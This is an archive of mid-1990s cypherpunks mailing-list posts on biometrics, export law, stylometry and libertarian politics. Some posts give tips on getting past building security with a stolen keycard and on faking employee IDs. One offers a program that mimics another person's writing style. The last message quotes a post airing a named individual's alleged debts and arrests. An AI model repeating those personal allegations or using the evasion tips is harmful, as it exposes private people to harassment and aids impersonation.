> 
> For that matter, if you can replace an amputated finger, how about
> transplanting a hand?  <shrug> 

Um.  With a password or keycard, its difficult to know if its been
stolen--if the keycard drops out of my pocket, I might not notice until I
need it again.  If my hand gets amputated, I'm fairly certain that I would
notice quite quickly... 

Ben.
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then 
I will never know happiness. For I am possessed by a fever for knowledge, 
experience, and creation."                                      -Anais Nin
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watson@tds.com
Date: Sun, 18 Feb 1996 16:34:33 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: anonymous age credentials, sharing of
In-Reply-To: <01I1AFAUEXFKA0V3BM@mbcl.rutgers.edu>
Message-ID: <Pine.SOL.3.91.960216175037.4163A-100000@mailman.tds.com>
MIME-Version: 1.0
Content-Type: text/plain


Did anybody see the movie Demolition Man?  Biometrics were "hacked" 
there.  I guess it's hard to be sure, but it seems something in your 
brain is tougher to extract than a finger or an eyeball.  The texts say a 
combination is a good idea.

On Fri, 16 Feb 1996, E. ALLEN SMITH 
wrote:

> From:	IN%"samman-ben@CS.YALE.EDU"  "Rev. Ben" 15-FEB-1996 20:05:34.89
> 
> >The only REAL way of authentication is biometrics.  Anything else can be 
> >swapped.  But if you amputate someone's hand or retinas then they won't 
> >work(check for things like blood flow, etc.)
> 
> 	Actually, a simulation ought to work pretty well at fooling most extant
> devices, and any devices likely to be developed soon. Now, fooling the guards
> watching you at a secure site may be a problem (a hand up your sleeve?), as
> may getting someone else's biometric information in the first place. The
> latter gets into the area of cryptography since whoever has such information
> (other than the original possessor) is likely to hash it anyway.
> 	-Allen
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 17 Feb 1996 09:48:40 +0800
To: tallpaul@pipeline.com
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <01I1AG4SXLR6A0V3BM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tallpaul@pipeline.com" 16-FEB-1996 01:02:01.32

>Why oh why am I getting the idea that "cypherpunks" would better be called
>"cryptoauthoritarians." From murder-as-political-liberation, to the
>universalization of the libertarians "feelings" onto everyone else in the
>world, to the mass nuclear bombings of civilians to the mass nuclear
>elimination of religions. 

	I'm a libertarian, and I mailed TCMay about that post - in private
email. I preferred not to clutter up the list, and am only doing so now in
case of political newbies otherwise believing you. I would point out that
Islam is currently noticeable for wrongdoing _when in control of a government_;
the same tends to be true of any religion, including my own of Christianity.
An example of such wrongdoing is the restriction of women in countries such as
Saudi Arabia (and, of course, Iran). Have you seen any libertarians advocating
banning the chador in the United States?

>My, my. For a group of people so uspet at taxes you certainly have faith in
>the ability of private individuals to generate the capital for things like
>the Manhattan Project and high-cost nuke delivery systems! 
 
	Unfortunately, neither of these would take that much. A university with
competent physics, engineering, and chemistry departments could do the first;
smuggling could do the second.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 17 Feb 1996 11:35:08 +0800
To: sasha1@netcom.com (Alexander Chislenko)
Subject: Re:  Computer unmasks Anonymous writer...
Message-ID: <m0tncCE-0008xLC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 AM 2/16/96 -0800, Alexander Chislenko wrote:
>  I ran my essays through Word grammar checker a while ago,
>and was surprised how stable the grammar statistics were.
>Complexity of the text (grade level) was the same to the decimal point,
>average length of sentences was consistent, etc.
>People also use the same styles of smileys or *highlights*, make
>consistent spelling errors, have their habits of indentation, etc.

What's the next step?  Writing a program which "fakes" somebody's style, right?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 17 Feb 1996 09:46:50 +0800
To: sasha1@netcom.com
Subject: Re:  Computer unmasks Anonymous writer...
Message-ID: <01I1AH3BILHOA0V3BM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: sasha1@netcom.com (Alexander Chislenko)

>  I ran my essays through Word grammar checker a while ago,
>and was surprised how stable the grammar statistics were.
>Complexity of the text (grade level) was the same to the decimal point,
>average length of sentences was consistent, etc.
>People also use the same styles of smileys or *highlights*, make
>consistent spelling errors, have their habits of indentation, etc.

	I'd like suggestions from people on what style/grammar checker is best
for reducing this kind of interpersonal variablity (and increasing the
intrapersonal variety by only using it sometimes). I use Grammatik 5 on some
posts, and it does seem to help.

>My suggestion at the time was to have randomizing output filter that
>would substitute synonyms, change spelling, modify paragraph formatting,
>etc.  - Style anonymizer, I'd call it.  Also, if small random changes are

	At least for the synonyms, I'd hope that a good grammar checker was
seeing if you weren't using a very large vocabulary. That's one problem I have
with Grammatik 5, in that it doesn't do this very well.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 17 Feb 1996 10:19:59 +0800
To: schneier@winternet.com (Bruce Schneier)
Subject: Re: ITAR Amended to Allow Personal Use Exemptions
In-Reply-To: <199602162229.QAA28245@parka>
Message-ID: <199602170028.TAA03679@homeport.org>
MIME-Version: 1.0
Content-Type: text


Since we don't need a license, what records are we supposed to keep?


| Today's Federal Register contains a notice from the Department of
| State, Bureau of Political Military Affairs, announcing final rule of
| an amendment to the International Traffic in Arms Regulation (ITAR)
| allowing U.S. persons to temporarily export cryptographic products for
* personal use without the need for an export license.  The product must
| not be intended for copying, demonstration, marketing, sale, re-export,
| or transfer of ownership or control.  It must remain in the possession
| of the exporting person, which includes being locked in a hotel room or
| safe.  While in transit, it must be with the person's accompanying
| baggage.  Exports to certain countries are prohibited -- currently
| Cuba, Iran, Iraq, Libya, North Korea, Sudan, and Syria.  The exporter
* must maintain records of each temporary export for five years.  See
| Federal Register, Vol. 61, No. 33, Friday, February 16, 1996, Public
| Notice 2294, pp. 6111-6113.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 17 Feb 1996 13:16:15 +0800
To: "John C. Randolph" <jcr@idiom.com>
Subject: Re: CDA Yes Votes; Collection
In-Reply-To: <jcr.824530373@idiom.com>
Message-ID: <Pine.SOL.3.91.960216205149.13025A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


So, if the US were to end up with a President Buchanan elected by 25% of 
all eligible voters, would you advocate seeking exile, or armed rebellion?

---
They say in  online country		So which side are you on boys
There is no middle way			Which side are you on
You'll either be a Usenet man		Which side are you on boys
Or a thug for the CDA			Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: walter@cithe302.cithep.caltech.edu (Chris Walter)
Date: Sat, 17 Feb 1996 08:04:51 +0800
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: [NOISE] Patents and Trademarks invalid
In-Reply-To: <199602161118.GAA10682@opine.cs.umass.edu>
Message-ID: <WALTER.96Feb16132444@cithe302.cithep.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199602161118.GAA10682@opine.cs.umass.edu> lmccarth@cs.umass.edu writes:

   Zachary Amsden writes:
   > (please don't e-mail me about this - I have enough e-mail already.  
   > Post instead)

   I'm confused. Instead of you alone getting a copy of every reply, you'd
   prefer the scenario where you get a copy of every reply, and so does 
   everyone else on the cypherpunks list, because _you_ get too much mail ?
   How does this scheme reduce the amount of email you get ?  Are you not in
   fact subscribed to cypherpunks ?

I suspect that he (like me) reads cypherpunks in News.  Here at
Caltech anyway the mailing list is gated into our NNTP news service.
This is a big improvement over having mailing list stuff in your normal
mail box.

-Chris

walter@cithe501.cithep.caltech.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 17 Feb 1996 14:51:36 +0800
To: "John C. Randolph" <cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
Message-ID: <m0tnfeL-0008yBC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:12 AM 2/17/96 GMT, John C. Randolph wrote:
>"Kevin S. Van Horn" <vanhorn@hks.net> writes:

>I also consider myself a hard-line libertarian, and I'm not going to second
>guess Truman on the use of the bomb.  His duty was to save American and
>allied lives.  He had no duty whatsoever to limit the destruction that
>was visited upon the japanese mainland, particularly in view of the 
>fact that Japan's war against the United States of America began in an
>unprovoked, suprise attack.
>
>Japan suffered for allowing their government to run amok.  So did Germany.
>Germans who were paying attention during the thirties fled their country,
>and those who were unfortunate enough to be trapped, and yet still loved
>freedom, became members of an anti-NAZI underground.
>
>Japan, Germany, Italy, and other countries like Iraq, where people place
>obedience to their leaders above their own moral responsiblity, will
>suffer mass destruction.  Think of it as evolution in action.
>-jcr

On the other  hand, there may be an alternative...

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSVt+PqHVDBboB2dAQFlpAP9GKNp2zRKHK1l8es1h4mp3YNEo1cQt0+e
Y6NwwavHCdtsGy4/xV0i3QVclmlx3Ffm+b6HMFpv/YPbWyQ+BUOz1GIMzAr7TzDB
SxQqZaH9Ezkv9dDExCfwZmGNIoXLGOzYjusWq3dsLpilf01mLNGLxlS8QK4XNg8H
RuHr91Axn20=
=TH0l
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 17 Feb 1996 13:02:07 +0800
To: cypherpunks@toad.com
Subject: LP infiltration of ballot boxes
Message-ID: <ad4a9c1a070210044e34@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:58 AM 2/17/96, "A. Padgett Peterson P.E. Information Security"

>BTW voted for Ed Clark once since "none of the above" was not an option.
>Spent the next year getting beg letters from various libertarian groups.

You clearly did more than merely vote, as even the LP has no way of knowing
who you voted for. Maybe you registered formally as a member of the LP,
maybe you made a donation, maybe you volunteered your name. Whatever.

But suggesting that by voting for Ed Clark you got on a mailing list is
unlikely in the extreme.

-Tim May, who once dreamed about Geraldine Ferrarro and got beg letters
from the Democratic Party for the next year!

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 18 Feb 1996 21:06:30 +0800
To: cypherpunks@toad.com
Subject: Re: credential "borrowing"
Message-ID: <960216225818.2021f6a7@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>Did anybody see the movie Demolition Man?  Biometrics were "hacked" 
>there.  I guess it's hard to be sure, but it seems something in your 
>brain is tougher to extract than a finger or an eyeball.  The texts say a 
>combination is a good idea.

Well, for a well funded adversary, the first step is to buy a duplicate
to the system to be subverted and analyze it. Usually is nnot difficult.
Problem with biometrics is the cost/speed. To do it right is going to
be slow/expensive. Few are.

However the traditional rule has been "something you have/something you know"
two factors are good, three are better.

In that line, along with one of my primary tasks (securing of notebooks)
have been warning people that if the information is valuable enough to require
that level of protection then the user is put at added risk the same way that
better automobile locks spawned carjackings. Duress codes are not difficult
to impliment.

BTW voted for Ed Clark once since "none of the above" was not an option.
Spent the next year getting beg letters from various libertarian groups.

						Warmly,
							Padgett

   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 17 Feb 1996 12:54:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Computer unmasks Anonymous writer...
In-Reply-To: <m0tncCE-0008xLC@pacifier.com>
Message-ID: <Pine.LNX.3.91.960216225636.2782A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 16 Feb 1996, jim bell wrote:

> At 09:20 AM 2/16/96 -0800, Alexander Chislenko wrote:
> >  I ran my essays through Word grammar checker a while ago,
> >and was surprised how stable the grammar statistics were.
> >Complexity of the text (grade level) was the same to the decimal point,
> >average length of sentences was consistent, etc.
> >People also use the same styles of smileys or *highlights*, make
> >consistent spelling errors, have their habits of indentation, etc.
> 
> What's the next step?  Writing a program which "fakes" somebody's style,
> right?

It's been done already.  A program was posted here a while ago that could
actually fake a person's writing style by analyzing word patterns.  It does
a pretty good job, too.  I can e-mail it to anyone who is interested.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMSVSmbZc+sv5siulAQEbTwQAh8+e51WN10DN6P4aLYoWrmLKLN3NWAJa
TW6hvckc/zq8SnFvsRg9TbwLgVon3uxi+OByYyBR98tLEOSKjNVwv/5XZ5M216Zs
UFk/a4fwWq/eJ2qnYkA9ultP7YQjPovJQCI+r+orJ6uLgoMiw4oLCbggpkpqET+X
lADi5zJncaY=
=+wAT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 17 Feb 1996 15:38:30 +0800
To: gw <lwp@conch.aa.msen.com
Subject: Re: Using lasers to communicate
Message-ID: <199602170708.XAA03191@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 AM 2/16/96 -0800, gw wrote:
> 50% mirrors picking off
> those laser beams would do it, and you could not detect the resulting
> attenuation as distinct from naturally ocurring attenuation and variation.  

Assume, as seems reasonable, that I point my laser from the roof of my house
to an ISP relay station located on a tall building or a nearby mountain.

An interception device will stick out like dogs balls.  Whoever wants to tap
my line is going to have to build a tower.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sat, 17 Feb 1996 15:37:05 +0800
To: cypherpunks@toad.com
Subject: Re: Libertarians and crypto and such
Message-ID: <2.2.32.19960217070627.0069dcf4@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:43 AM 2/17/96 -0500, tallpaul wrote:

>While the LP or its majority may not call for the things I've critiqued,
>certainly libertarians have. Nor, as far as I can recall, have LPers
>repeatedly posted to the cypherpunk list material that is on-the-surface at
>least significantly off-topic; libertarians have. And I responded. 

So you get the fun of attacking this straw man called "libertarians" without
any responsibility to identify any actual people it might include other than
a handful of folks that the vast majority of us think are kooks. And you've
also acquired the remarkable mental power, apparently, to discern who is or
is not an LP member based on their posts here.

Neat tricks.

But until they're joined with a willingness to look at a wider range of
libertarian posts than the fragment that feeds your pet peeves, I reserve
the right to be impressed.

And yes, this is off-topic. So this is all I have to say about it.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Feb 1996 06:50:58 +0800
To: cypherpunks@toad.com
Subject: Re: Some thoughts on the Chinese Net
Message-ID: <ad4ab60208021004649b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:00 PM 2/15/96, Carl Ellison wrote:
>At 12:31 2/15/96, Jon Lasser wrote:
>>How would packets coming into the country be marked / passed on?
>
>Presumably, you'd need a Chinese-approved identity key in order to get
>packets into the country.

Chinese web surfers are tracked by a special "cookie," a la the Netscape
cookie, but with special features. The "Chinese fortune cookie."

(The crypto block managers open your cookies and tell you your fortune.)

Packets are laundered, of course, in a Chinese packet laundry.

Fat Fong say man who write in code get run over by tank.


--Tim May


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should fuck him." So the two daughters got him drunk and
screwed him all that night. Sure enough, Dad got them pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents,
your pet dog, or the farm animals, unless God tells you to. [excerpts from
the Old Testament, Modern Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 17 Feb 1996 16:21:21 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Libertarians and crypto and such
Message-ID: <01BAFCCD.00AC5860@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


A note on the arguments disintegrating into granular accusations & counter accusations:

Some of you ought to realize that no matter what category of political/philosophical inclinations a person has, or deems themselves to have, or is deemed to have by others, they as individuals are still going to have their own peculiar perspective, their own version, of these views.   

Meaning, that it is not 100% predictable that *all* libertarians will think & do the same as all other so-called "libertarians".  "Democrats" or "Republicans" or even "wiccans" will have their own variations on the same themes and disagree among themselves over what the most correct policy for action could be/should be/shall be.

These labels for philosophical & political stands are really only general indicators of an individual's conclusions about worldy events or the direction in which they tend to orient their sympathies;  when the "rubber meets the road" and real action or some real support is required, it can be quite surprising to see their actual responses to events.

Whether one person or a like-minded group is aligned philosophically correctly (suitable to one's own preferences) or not, is info that is useful only for determining trends; no matter what combination of beliefs a particular group concocts into a world-view, it is still required of the individual person that they deal effectively with whatever threats arise in *their own* immediate Present, regardless of what anyone else did in the History of Mankind or what "those other groups" extol as being The Right Thing for All (tm).

Aren't one's own actions more important and telling than any group affiliations?

The ideals which motivate one to seek the use of encryption are very significant to the need to justify the use of it.  The most valid ideals will relate to the real world in which we all actually work and play.   And The Truth Which Does Not Go Away is the indispensable Fact of the Matter that when the NSA proposes to open your personal files you are going to want to prevent it, no matter what political party or program you claim to support the rest of the time.

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 18 Feb 1996 08:53:00 +0800
To: cypherpunks@toad.com
Subject: Cybercrooks
Message-ID: <199602162322.AAA03497@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Dream of the Internet Becomes Worst Nightmare


Manhasset, N.Y., Feb. 16 -- Technology managers, who
dreamed of the Internet as a new business tool and
championed their cause to senior management, are waking
up to nightmares of security gone awry, reports CMP's
InformationWeek in its February 19 issue.

"The incidence of cybercrook attacks to mine or sabotage
a company's information resources is rising rapidly,"
states Bob Violino, editor-at-large of InformationWeek.
"What is especially alarming is that despite the fact
that companies like Rockwell International and Merrill
Lynch and various government agencies employ the latest
firewall and encryption technology available, they are
experiencing security breaches on a regular basis."

Business users have been particularly skittish about the
Internet since last September, when two computer science
students at the University of California at Berkeley
cracked the public-key encryption code used by Netscape
Communications Corp.'s popular browser software.

"There are more experts than ever in the intruder
community who know the infrastructure of the Internet,"
explains Cathy Fithen, CERT's team leader of strategic
incident response.  "In the past we saw people breaking
into systems using passwords.  Now they look for flaws to
exploit involving networking protocols and source codes
for operating systems."

The fear of invasion is well founded, according to
federal law enforcement agencies, which have stepped up
their investigations of online intrusions.  "We're aware
that this is a serious problem for any industry using the
Internet," says Jim Freeman, special agent in charge of
the FBI's San Francisco office.

"Salvation from the government, or from vendors with new
security products, seems unlikely," says Violino.
"History shows that as soon as new security tools are
developed, hackers learn to crack them.  And while not
every company possesses trade secrets, security is still
a must for everyone in business.  For now, at least,
absolute security is one thing the Net can't offer."

But, companies are so focused on Internet intrusions from
outsiders that they often fail to consider the
possibility of an inside hacker.  According to John
Reinke, chief information security architect at Merrill
Lynch & Co., Inc. in New York, "There is no modern large
organization that I now of that does internal firewalls."

At Bell Laboratories, where an internal network links
some 300,000 host computers around the world, security is
a constant concern. "We're bigger than the entire
Internet was in the late 1980s," says Bill Cheswick,
technical staff manager at the labs' computer science
research department in Murray Hill, N.J.  "Our firewall
keeps the bad guys out but you can't say there aren't bad
guys inside the company."

--












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sat, 17 Feb 1996 15:05:51 +0800
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: anonymous age credentials, sharing of
In-Reply-To: <Pine.A32.3.91.960216174948.14448F-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <Pine.3.89.9602170002.B3588-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 16 Feb 1996, Rev. Ben wrote:

> Um.  With a password or keycard, its difficult to know if its been
> stolen--if the keycard drops out of my pocket, I might not notice until I
> need it again.  If my hand gets amputated, I'm fairly certain that I would
> notice quite quickly... 

Reminded me of that scene in "Sneakers" where they steal the guy's keycard
to get in.  Risks of leaving that sort of thing in one's jacket pocket. 
Also, lots of high-tech places have at least one automated
unattended/unmonitored entrance, so if you get a keycard, it's easy to get
into the place (my current employer has unattended entrances with
cameras).  Even with the manned entrances, the ones with just a
receptionist/secretary, they seldom check that the picture matches the one
on the badge, so even if they've invalidated the badge, the receptionist
will still more than likely let you into the place if you wave your
keycard/badge around. Highlights the need to *still* concentrate on
physical security and authentication - all the electronic toys just make
security folks lazy. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 17 Feb 1996 14:09:49 +0800
To: cypherpunks@toad.com
Subject: Re: Libertarians and crypto and such
Message-ID: <199602170543.AAA21054@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 16, 1996 12:34:42, 'Thomas Grant Edwards <tedwards@Glue.umd.edu>'
wrote on libertarians and the Libertarian Party. 
 
I am able to draw a distinction between people whose primary political
identification is with the Libertarian Party (LP) and "small el"
libertarians just as I am able to draw similar distinctions between people
in the Communist Party U.S.A. and "small c" communists or members of the
Socialist Party U.S.A. and "small s" socialists. 
 
While I have an enormous number of disagreements with the LP I have never
presented any critique on the list of the LP. I've spent many evenings with
LP members in bars or coffee shops arguing over politics. On more than one
occasion I've been at the same demos with LPers, generally over issues like
"reform" (i.e. total elimination) of the drug laws. 
 
On the basis of my personal observations in the 1980s and 90s I consider
LPers to be far more honest and well-informed than libertarians, just as I
consider old-style Randian Objectivists far more principled that today's
libertarian "Subjectivists." 
 
You are far more able than I to state with certaintude what the general
policies of the LP are. 
 
But the LP is not the total class of libertarians nor all of the individual
libertarians. 
 
While the LP or its majority may not call for the things I've critiqued,
certainly libertarians have. Nor, as far as I can recall, have LPers
repeatedly posted to the cypherpunk list material that is on-the-surface at
least significantly off-topic; libertarians have. And I responded. 
 
--tallpaul 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sat, 17 Feb 1996 15:31:16 +0800
To: "Benjamin T. Moore" <btmoore@iquest.net>
Subject: Re: Ben T. Moore "Mr. Anonymous"
In-Reply-To: <m0tng5p-004XHRC@iquest.net>
Message-ID: <Pine.3.89.9602170044.D3588-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


If all you want to do is hide, not commit fraud, you're pretty safe. 
There's nothing that says that you can't change your name or use an MBE
mailbox or refuse to give out your phone number or even fake an employee
ID - as long as you're not trying to defraud someone. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 17 Feb 1996 14:51:44 +0800
To: cypherpunks@toad.com
Subject: Re: True democracy in America.
Message-ID: <9602170604.AA15355@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Isaac Hopkins <Isaac.C.Hopkins-1@tc.umn.edu> wrote:

[ Crypto Relevancy: Hey, if you cannot figure it out, too bad for you...]
[[ Sorry, I am in a bitchin mood today.  It happens not too often]]


>A truly Democratic society is only feasible when you have an educated
>society that can act outside of their own self interest. 

This is why we do not need a "true" democracy.  Why should any individual act in a way
that is not in his best interest?

The blanked-out concept here is the concept of "best-interest"

It would be *very* interesting to drag the collectivists into such a debate.

But they are wise enough to thread away from what is, to them, quicksand...
 

>In a democratic society you must be accepted by
>the majority in order to survive.  

>Think about all of the greatest minds in
>history, most of them were very controversial.  A democracy is just the
>tyranny of the majority.

Then, why strive for it?  Apparently, it is not in the best *long term* interest
of the vast majority of individual in that society...

JFA
Selfishness is a fundamental Virtue.
**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 17 Feb 1996 14:41:41 +0800
To: cypherpunks@toad.com
Subject: Re: Patents and Trademarks invalid
Message-ID: <9602170607.AA15430@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>Here's an idea: whenever someone uploads something like the RC2 source code,
>why not have everyone attach it to their .signature?  Is criminal justice
>seriously going to pursue tracking down millions of people that did this?
>Or would they pull the plug.

Man's survival tool is his mind.

Patents and copyright are establishing the ownership and protection
the result of the exercise of his survival tool.

Therefore they are good.

To try to eliminate them is equivalent to promote slavery.

JFA
**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Sat, 17 Feb 1996 15:01:29 +0800
To: cypherpunks@toad.com
Subject: Re: Ben T. Moore "Mr. Anonymous"
Message-ID: <m0tng5p-004XHRC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 2/14/96 -0800, hochiminh@alpha.c2.org wrote:
><<<<Quoting Ben T. "Mr. Anonymous" Moore to Karl>>>>

                                           ***** SNIP *****
                                 (Much deleted for brevity)

>Well, Mr. Anonymous, let's see how well YOU have used your own advice.  With
>just a little effort using WEB search engines available to everyone on the net I
>have found the following:
>
>Yes you have no credit history, at least not a positive history and you have no bank
>account.  However, these "accomplishments" were not the result of your "goal" to be "invisible to the system".  You have a credit history, a VERY poor one.  This and the fact that you have no bank account stems from the fact that you are a deadbeat not some cyber-hero looking to "drop-out" of the system.  You are approximately $13,000.00 behind in child support.  In fact a search of the records available to the general public reveals you were recently arrested for failure to pay child support.  A fund rasing campaign was instituted in several USENET and FIDONET newsgroups to raise your bail when your attorney-employer abandoned you in jail.  In fact you have been arrested several times in the last 12 months for some rather abberant behavior.

Ok I'll respond to this first paragraph:

